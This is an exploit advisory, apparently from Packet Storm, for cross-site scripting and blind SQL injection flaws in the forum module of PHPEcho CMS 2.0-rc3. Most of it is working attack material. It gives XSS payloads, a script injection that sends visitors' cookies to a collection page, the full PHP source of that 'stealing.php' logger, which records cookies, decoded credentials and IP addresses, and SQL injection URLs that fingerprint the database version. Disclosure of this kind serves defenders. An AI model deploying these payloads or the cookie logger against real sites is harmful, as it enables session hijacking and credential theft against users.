PHPEcho CMS version 2.0-rc3 suffers from cross site scripting and blind SQL injection vulnerabilities.
4cfcda462a15a7d3dd071f6054d698ff814a93e29dcc432dde1c585812b90e22PHPEcho CMS 2.0-rc3 (forum) XSS Cookie Stealing / Blind Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/
- download: http://sourceforge.net/project/showfiles.php?group_id=186100
~ [XSS]
The forum allowed insert javascript code and html code.
PoC:
"><h1>0wned</h1>
"><script>alert("JosS b0x");</script>
-----------
Cookie Stealing:
<script>window.location=’http://127.0.0.1/stealing.php?cookie=’+document.cookie</script>
stealing.php
<?php
$archivo = fopen('log.htm','a');
$cookie = $_GET['c'];
$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;
$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USER and PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br>
IP: ' .$ip. '<br> Date and Time: ' .$fecha. '</hr>');
fclose($archivo);
?>
~ [BLIND]
PoC:
/index.php?module=forum&show=thread&id=1 and 1=2 [False]
/index.php?module=forum&show=thread&id=1 and 1=1 [True]
/index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=5
/index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=4
__h0__
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed